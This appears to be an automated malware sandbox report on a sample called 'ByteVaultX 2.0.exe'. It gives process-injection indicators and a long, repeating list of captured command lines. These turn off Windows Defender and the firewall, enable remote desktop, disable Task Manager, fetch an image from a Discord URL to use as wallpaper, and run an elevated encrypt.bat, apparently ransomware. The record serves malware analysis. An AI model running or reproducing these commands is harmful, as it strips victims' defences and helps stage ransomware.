Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2196 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 2196 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 3068 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 3068 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 3068 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 3068 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 3068 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 3068 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 2852 wrote to memory of 4092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 4092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 1760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 1760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 4740 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 4740 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3356 wrote to memory of 2968 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 3356 wrote to memory of 2968 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 3356 wrote to memory of 2968 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 3356 wrote to memory of 2968 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 2852 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 1760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 1760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 824 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 824 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 3128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 3128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 4012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 4012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 4760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 4760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 2324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 2324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2852 wrote to memory of 392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 1360 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 1360 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 3624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 3624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 3716 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 3716 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 2192 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 2192 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 704 wrote to memory of 2512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 704 wrote to memory of 2512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\SYSTEM32\runas.exe

runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

